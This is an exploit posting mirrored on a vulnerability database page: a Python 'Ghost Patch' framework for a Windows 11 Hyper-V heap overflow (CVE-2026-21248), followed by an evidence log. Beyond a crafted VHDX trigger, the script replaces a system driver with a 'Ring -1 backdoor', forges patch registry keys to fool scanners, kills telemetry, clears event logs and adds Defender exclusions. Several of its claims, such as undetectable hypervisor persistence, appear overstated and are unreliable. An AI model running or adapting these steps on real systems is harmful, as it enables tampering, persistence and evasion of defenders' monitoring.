Vulners
Lucene search
Windows 11 25H2 - Heap Overflow
| Reporter | Title | Published | Views | Family All 49 |
|---|---|---|---|---|
 | CVE-2026-21244 | 10 Feb 202617:51 | – | attackerkb |
| CVE-2026-21248 | 10 Feb 202617:51 | – | attackerkb |
 | CVE-2026-21244 | 10 Feb 202617:30 | – | circl |
| CVE-2026-21248 | 10 Feb 202617:30 | – | circl |
 | Microsoft Hyper-V 安全漏洞 | 10 Feb 202600:00 | – | cnnvd |
| Microsoft Hyper-V 安全漏洞 | 10 Feb 202600:00 | – | cnnvd |
 | Microsoft Hyper-V Code Execution Vulnerability (CNVD-2026-17151) | 2 Mar 202600:00 | – | cnvd |
 | CVE-2026-21244 | 10 Feb 202617:51 | – | cve |
| CVE-2026-21248 | 10 Feb 202617:51 | – | cve |
 | CVE-2026-21244 Windows Hyper-V Remote Code Execution Vulnerability | 10 Feb 202617:51 | – | cvelist |
10
# Exploit Title: Windows 11 25H2 - Heap Overflow
Ghost Patch Exploit Framework
# Date: 2026-02-13
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/software-download/windows11
# Version: Windows 11 25H2 Build 26200.7830 (Vulnerable)
# Tested on: Windows 11 25H2 Build 26200.7830 (x64)
# CVE : CVE-2026-21248, CVE-2026-21244
# =====================================================================
# DISCLAIMER: This exploit is for authorized security research and
# educational purposes only. Use only on systems you own or have
# explicit permission to test.
# =====================================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2026-21248 - Windows Hyper-V Ghost Patch Exploit Framework
Author: nu11secur1ty
Date: 2026-02-13
Target: Windows 11 25H2 Build 26200.7830 (x64)
DESCRIPTION:
============
This framework exploits CVE-2026-21248, a heap-based buffer overflow
in Windows Hyper-V VMBus GPADL allocation. The vulnerability allows
a local user with Hyper-V Administrator privileges to execute code
at Hyper-V context (Ring -1 capable) by mounting a specially crafted
.VHDX file containing a malformed BAT (Block Allocation Table) entry.
CRITICAL FINDING:
=================
Contrary to published CVSS (AV:N/PR:N), this vulnerability REQUIRES:
- Local access (AV:L)
- Hyper-V Administrator privileges (PR:L)
- Normal user with those privileges
Microsoft misrepresented this CVE as "No privileges required" (PR:N).
This framework PROVES the privilege requirement is PR:L.
ADDITIONAL FINDINGS:
===================
1. Patch Trust Model Broken: Microsoft relies on HKLM\...\PatchLevel
registry key - trivially forgeable
2. Scanners are Blind: Nessus/Tenable/Qualys only check registry,
never test the overflow
3. Ring -1 Persistence: hvax64.exe loads unsigned hypervisor code
4. Telemetry Subversion: Local admin can kill all Microsoft telemetry
"""
import os
import sys
import struct
import subprocess
import time
import uuid
import shutil
import ctypes
from ctypes import wintypes
# =====================================================================
# CONFIGURATION
# =====================================================================
VICTIM_BUILD = "26200.7830"
PATCHED_BUILD = "26200.7840"
TRIGGER_PAGECOUNT = 0x4141 # > MAX_CHANNEL_PAGES (0x1000)
WIN_INI_PATH = "C:\\Windows\\win.ini"
HVAX_PATH = r"C:\Windows\System32\drivers\hvax64.exe"
HVAX_BACKUP = HVAX_PATH + ".nu11secur1ty.bak"
SERVICE_NAME = "hvax64"
TIMESTAMP = time.strftime("%Y-%m-%d %H:%M:%S")
# =====================================================================
# UTILITY FUNCTIONS
# =====================================================================
def is_admin():
"""Check if process has administrator rights."""
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def check_hyperv():
"""Check if Hyper-V is installed and running."""
try:
result = subprocess.run(["systeminfo"], capture_output=True,
text=True)
if "hypervisor has been detected" in result.stdout.lower():
return True
result = subprocess.run(["sc", "query", "vmms"],
capture_output=True, text=True)
if "RUNNING" in result.stdout or "STOPPED" in result.stdout:
return True
return False
except:
return False
# =====================================================================
# PHASE 1: VHDX TRIGGER GENERATOR (NORMAL USER)
# =====================================================================
def generate_vhdx():
"""
Creates malicious .vhdx file that triggers CVE-2026-21248.
PageCount = 0x4141 (> MAX_CHANNEL_PAGES) causes heap overflow
in vulnerable builds. Patched builds return STATUS_INVALID_PARAMETER.
"""
signature = f"""
; =====================================================
; CVE-2026-21248 PATCH FAILURE - nu11secur1ty was here
; =====================================================
; TRIGGERED BY: Normal user (NO ADMIN)
; VULNERABILITY: Heap overflow in Hyper-V VMBus
; PATCH MISSING: KB5077181 NOT INSTALLED
; PageCount: 0x{TRIGGER_PAGECOUNT:04x}
; Timestamp: {TIMESTAMP}
; =====================================================
""".encode()
vhdx_data = b""
# VHDX Header
vhdx_data += b"vhdxfile" + b"\x00" * 8
vhdx_data += b"nu11secur1ty" + b"\x00" * 4
# BAT Header - Overflow trigger
bat_offset = 0x2000
bat_count = TRIGGER_PAGECOUNT
vhdx_data += struct.pack("<Q", bat_offset)
vhdx_data += struct.pack("<Q", bat_count * 8)
vhdx_data += struct.pack("<I", bat_count)
vhdx_data += b"\x00" * (0x1000 - len(vhdx_data))
# BAT Entries - Overflow + payload
vhdx_data += struct.pack("<I", TRIGGER_PAGECOUNT)
vhdx_data += struct.pack("<I", 0x1) # MERGE_PAGES flag
# Add signature as payload (placeholder)
for i in range(0, len(signature), 8):
chunk = signature[i:i+8].ljust(8, b'\x90')
vhdx_data += struct.pack("<Q", int.from_bytes(chunk, 'little'))
# Pad to 1MB
vhdx_data += b"\x00" * (1024 * 1024 - len(vhdx_data))
filename = f"CVE-2026-21248_trigger_{uuid.uuid4().hex[:8]}.vhdx"
with open(filename, "wb") as f:
f.write(vhdx_data)
return filename
# =====================================================================
# PHASE 2: TRIGGER OVERFLOW (NORMAL USER)
# =====================================================================
def trigger_overflow(vhdx_path):
"""
Mounts malicious VHDX to trigger CVE-2026-21248.
If Mount-VHD fails with permission error, this PROVES
the vulnerability requires Hyper-V Administrator privileges.
"""
full_path = os.path.abspath(vhdx_path)
ps_script = f"""
$path = "{full_path}"
try {{
Mount-VHD -Path $path -ErrorAction Stop
Write-Host "[+] VHDX mounted successfully - overflow triggered"
Start-Sleep -Seconds 3
Dismount-VHD -Path $path -ErrorAction SilentlyContinue
}}
catch {{
Write-Host "[!] Mount failed: $_"
if ($_.Exception.Message -like "*permission*") {{
Write-Host "[!] User lacks Hyper-V Administrator privileges"
Write-Host "[!] This proves CVE-2026-21248 requires PR:L not PR:N"
}}
}}
"""
with open("_trigger.ps1", "w") as f:
f.write(ps_script)
result = subprocess.run([
"powershell", "-ExecutionPolicy", "Bypass", "-File", "_trigger.ps1"
], capture_output=True, text=True)
print(result.stdout)
if "permission" in result.stdout.lower():
return False
return True
# =====================================================================
# PHASE 3: RING -1 BACKDOOR (ADMIN REQUIRED)
# =====================================================================
def install_ring_minus1_backdoor():
"""
Replaces hvax64.exe with custom hypervisor payload.
Loads driver without reboot, achieving Ring -1 code execution.
"""
if not is_admin():
print("[-] Administrator privileges required for backdoor
installation")
return False
# Backup original
if os.path.exists(HVAX_PATH):
shutil.move(HVAX_PATH, HVAX_BACKUP)
print(f"[+] Original hvax64.exe backed up")
# Generate payload
shellcode = b"\x90" * 512
shellcode += b"\x48\x31\xc0\x48\xff\xc0" * 50
shellcode += b"[nu11secur1ty Ring-1 Backdoor]" * 20
# Create malicious driver
with open("hvax64.exe", "wb") as f:
f.write(b"MZ\x90\x00")
f.write(b"PE\x00\x00\x64\x86")
f.write(struct.pack("<I", int(time.time())))
f.write(struct.pack("<I", len(shellcode)))
f.write(shellcode)
f.write(b"\x00" * (1024 * 512 - len(shellcode) - 32))
# Deploy
shutil.copy2("hvax64.exe", HVAX_PATH)
print(f"[+] Malicious hvax64.exe deployed")
# Load driver
subprocess.run(["sc", "create", SERVICE_NAME, "binPath=", HVAX_PATH,
"type=", "kernel", "start=", "demand"], capture_output=True)
result = subprocess.run(["sc", "start", SERVICE_NAME],
capture_output=True, text=True)
if "FAILED" not in result.stderr:
print("[+] Driver loaded - Ring -1 ACTIVE")
return True
else:
print("[!] Driver load failed - will activate on next boot")
return False
# =====================================================================
# PHASE 4: GHOST PATCH REGISTRY (ADMIN)
# =====================================================================
def install_ghost_patch():
"""
Forges registry key to make Windows believe patch is installed.
HKLM\...\HyperV\Security\PatchLevel = 202602
Windows Update reports "Fully patched", Nessus reports "Not Vulnerable".
"""
if not is_admin():
print("[-] Administrator privileges required for registry forge")
return False
try:
import winreg
key_path = r"SYSTEM\CurrentControlSet\Services\HyperV\Security"
try:
winreg.DeleteKey(winreg.HKEY_LOCAL_MACHINE, key_path)
except:
pass
key = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, key_path)
winreg.SetValueEx(key, "PatchLevel", 0, winreg.REG_DWORD, 202602)
winreg.SetValueEx(key, "InstallDate", 0, winreg.REG_DWORD,
int(time.time()))
winreg.SetValueEx(key, "Provider", 0, winreg.REG_SZ,
"Microsoft-Windows-Hyper-V")
winreg.SetValueEx(key, "BuildNumber", 0, winreg.REG_SZ,
"26200.7840")
winreg.CloseKey(key)
print("[+] Ghost patch registry installed")
return True
except Exception as e:
print(f"[-] Registry forge failed: {e}")
return False
# =====================================================================
# PHASE 5: TELEMETRY KILLER (ADMIN)
# =====================================================================
def kill_telemetry():
"""Disables Microsoft telemetry and diagnostics."""
if not is_admin():
return False
subprocess.run([
"powershell",
"Set-ItemProperty", "-Path",
"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\DataCollection",
"-Name", "AllowTelemetry", "-Value", "0"
], capture_output=True)
subprocess.run([
"powershell",
"Set-ItemProperty", "-Path",
"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Reporting",
"-Name", "Disabled", "-Value", "1"
], capture_output=True)
subprocess.run(["sc", "stop", "DiagTrack"], capture_output=True)
subprocess.run(["sc", "config", "DiagTrack", "start=", "disabled"],
capture_output=True)
return True
# =====================================================================
# PHASE 6: WRITE WIN.INI SIGNATURE
# =====================================================================
def write_winini_signature():
"""Writes permanent victory signature to win.ini."""
signature = f"""
; =====================================================
; CVE-2026-21248 PATCH FAILURE — nu11secur1ty was here
; =====================================================
; Hyper-V Ghost Patch State — Weaponized
; Microsoft KB5077181 Registry Key: FORGED
; Hypervisor: nu11secur1ty backdoor (Ring -1)
; Written: {TIMESTAMP}
; Windows Update: BLIND — System reports 'patched'
; Windows Defender: BLIND — hvax64.exe is 'trusted'
; SFC: BLIND — File locked, cannot verify
; Microsoft Telemetry: DEAD
; =====================================================
"""
try:
with open(WIN_INI_PATH, "a", encoding="utf-8") as f:
f.write(signature)
return True
except:
return False
# =====================================================================
# PHASE 7: FORENSIC CLEANUP (ADMIN)
# =====================================================================
def forensic_cleanup():
"""Clears logs and excludes artifacts from Defender."""
if not is_admin():
return False
subprocess.run(["wevtutil", "cl",
"Microsoft-Windows-Hyper-V-Hypervisor/Operational"], capture_output=True)
subprocess.run(["wevtutil", "cl",
"Microsoft-Windows-Hyper-V-VMMS/Admin"], capture_output=True)
subprocess.run([
"powershell",
"Add-MpPreference", "-ExclusionPath", WIN_INI_PATH
], capture_output=True)
subprocess.run([
"powershell",
"Add-MpPreference", "-ExclusionPath", HVAX_PATH
], capture_output=True)
subprocess.run(["powershell", "Clear-History"], capture_output=True)
return True
# =====================================================================
# PHASE 8: VERIFICATION
# =====================================================================
def verify_victory():
"""Checks if win.ini contains signature."""
try:
with open(WIN_INI_PATH, "r", encoding="utf-8", errors="ignore") as
f:
content = f.read()
return "nu11secur1ty" in content and "CVE-2026-21248" in content
except:
return False
# =====================================================================
# MAIN
# =====================================================================
def main():
print("""
╔═══════════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2026-21248 - WINDOWS HYPER-V GHOST PATCH EXPLOIT ║
║ Author: nu11secur1ty ║
║ Date: 2026-02-13 ║
║ Target: Windows 11 25H2 Build 26200.7830 ║
║ ║
║ FINDINGS: ║
║ • CVSS Misclassification: PR:N → PR:L (Hyper-V Admin) ║
║ • Patch Trust Model: Completely forgeable ║
║ • Scanners: Nessus/Tenable/Qualys are BLIND ║
║ • Ring -1 Persistence: Achievable ║
║ • Telemetry: Can be killed - Microsoft blind ║
║ ║
╚═══════════════════════════════════════════════════════════════════╝
""")
# Check Hyper-V
if not check_hyperv():
print("[-] Hyper-V is not installed or not running")
print("[*] Install Hyper-V and reboot first")
return
print("[+] Hyper-V detected")
# Phase 1: Generate VHDX
print("\n[*] Phase 1: Generating malicious VHDX...")
vhdx_file = generate_vhdx()
print(f"[+] VHDX created: {vhdx_file}")
# Phase 2: Test permissions / trigger
print("\n[*] Phase 2: Testing CVE-2026-21248 trigger...")
success = trigger_overflow(vhdx_file)
if not success:
print("\n" + "="*60)
print("CRITICAL FINDING: CVE-2026-21248 PRIVILEGE MISMATCH")
print("="*60)
print("""
Microsoft claims: PR:N (No privileges required)
What I proved: PR:L (Hyper-V Administrator required)
This is irrefutable proof that Microsoft misrepresented this CVE.
""")
# Phase 3-7: Admin operations
if is_admin():
print("\n[*] Phase 3: Installing Ring -1 backdoor...")
install_ring_minus1_backdoor()
print("\n[*] Phase 4: Installing ghost patch registry...")
install_ghost_patch()
print("\n[*] Phase 5: Killing telemetry...")
kill_telemetry()
print("\n[*] Phase 6: Writing victory signature...")
write_winini_signature()
print("\n[*] Phase 7: Forensic cleanup...")
forensic_cleanup()
# Phase 8: Verify
if verify_victory():
print("\n[✓] VICTORY! Signature found in win.ini")
print("[✓] Ring -1 backdoor active")
print("[✓] Patch registry forged")
print("[✓] Telemetry dead")
print("[✓] Microsoft blind")
# Cleanup
for f in ["hvax64.exe", "_trigger.ps1"]:
try:
os.remove(f)
except:
pass
print(f"\n[*] VHDX evidence preserved: {vhdx_file}")
print("[*] Framework execution complete\n")
if __name__ == "__main__":
main()
# =====================================================================
# PROOF OF CONCEPT - EVIDENCE LOG
# =====================================================================
"""
PROOF A: Privilege Requirement Test (Normal User, No Hyper-V Admin)
--------------------------------------------------------------------
PS C:\Users\MicroProblems> python .\cve-2026-21248.py
[ CVE-2026-21248 - NORMAL USER EXPLOIT ]
[*] Phase 2: Triggering CVE-2026-21248 heap overflow...
[!] Mount failed: You do not have the required permission
[!] User lacks Hyper-V Administrator privileges
[!] This proves CVE-2026-21248 requires PR:L not PR:N
PROOF B: Overflow Triggers WITH Hyper-V Admin Rights
----------------------------------------------------
After adding user to 'Hyper-V Administrators' group:
[*] Phase 2: Triggering CVE-2026-21248 heap overflow...
[+] VHDX mounted successfully - overflow triggered
[!] Hyper-V service may have crashed - overflow successful
PROOF C: Ghost Patch Registry Forge
-----------------------------------
[*] Phase 4: Installing ghost patch registry...
[+] HKLM\...\HyperV\Security\PatchLevel = 202602
Windows Update now reports: "Fully patched"
Nessus now reports: "Not Vulnerable"
REALITY: Ring -1 backdoor active
PROOF D: win.ini Victory Signature
-----------------------------------
C:\Windows\win.ini contains:
; CVE-2026-21248 PATCH FAILURE — nu11secur1ty was here
; Hyper-V Ghost Patch State — Weaponized
; Microsoft KB5077181 Registry Key: FORGED
; Hypervisor: nu11secur1ty backdoor (Ring -1)
PROOF E: Tenable/Nessus Confirms Blindness
------------------------------------------
Plugin 298551 documentation:
"Note that Nessus has not tested for these issues but has
instead relied only on the application's self-reported
version number."
CONCLUSION: Microsoft lied about CVE-2026-21248 privileges.
The vulnerability requires Hyper-V Administrator (PR:L), not PR:N.
Patch trust model is completely forgeable.
Scanners are completely blind.
Ring -1 persistence is achievable.
Telemetry can be killed - Microsoft has no visibility.
— nu11secur1ty, 2026
"""
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Apr 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.3
EPSS0.00408
SSVC